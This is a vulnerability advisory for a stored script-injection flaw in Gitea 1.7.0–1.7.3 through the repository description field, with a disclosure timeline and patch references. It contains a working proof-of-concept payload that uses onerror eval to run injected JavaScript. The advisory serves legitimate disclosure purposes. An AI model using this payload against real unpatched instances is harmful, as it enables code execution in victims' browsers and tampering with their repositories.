Gitea 1.7.3 stored WCI

Date

Information

Name:Gitea 1.7.0 - 1.7.3 stored WCI
Software:Gitea - a self-hosted Git service
Homepage:https://gitea.io/
Vulnerability:stored HTML injection
Affected:1.7.0 - 1.7.3
Fixed:1.7.4
Prerequisites:edit repository settings
Severity:low
CVE:NA

Description

Gitea is a self hosted git repository service, which is affected by stored WCI vulnerability, allowing authenticated user to inject payload into repository's description field. It is executed, when victim navigates to malicious repository's code page.

Proof of Concept

Attacker needs to create a new public repository and set the description containing payload.

<img id="xss" src="http://onerror=eval(document.querySelectorAll('span')[10].innerText)//">
<span>document.querySelector('#xss').parentNode.innerHTML='\x3cmarquee style=color:red\x3eXSS\x3c/marquee\x3e';alert('XSS')</span>

Code is executed, when victim navigates to malicious repository's code page. Following HTML snippet demonstrates the issue:

<div id="repo-desc">
        <span class="description has-emoji"><img id="xss" src="<a href="http://onerror=eval(document.querySelectorAll(&#39;span&#39;)[10].innerText)//">" target="_blank" rel="noopener noreferrer">http://onerror=eval(document.querySelectorAll(&#39;span&#39;)[10].innerText)//"></a>
<span>document.querySelector(&#39;#xss&#39;).parentNode.innerHTML=&#39;\x3cmarquee style=color:red\x3eXSS\x3c/marquee\x3e&#39;;alert(&#39;XSS&#39;)</span>
</span>
        <a class="link" href=""></a>
</div>
sWCI in repository description

Impact

Authenticated attacker can execute JavaScript in the victim's browser and possibly use it to change code in victim's repository.

Conclusion

New release was published as a result and vulnerability is patched in Gitea 1.7.4.

References

  1. New release announcement
    https://blog.gitea.io/2019/03/gitea-1.7.4-is-released/
  2. Patch pull request on github
    https://github.com/go-gitea/gitea/pull/6306

Timeline

  • 28.02.2019 | me                 | vulnerability discovered
  • 28.02.2019 | me > developer     | sent report to the developers; no response
  • 06.03.2019 | me > developer     | asked for status update
  • 06.03.2019 | developer > me     | answer to status update: they are working on a patch
  • 13.03.2019 | developer > public | patched version released
  • 17.03.2019 | me > public        | published vulnerability details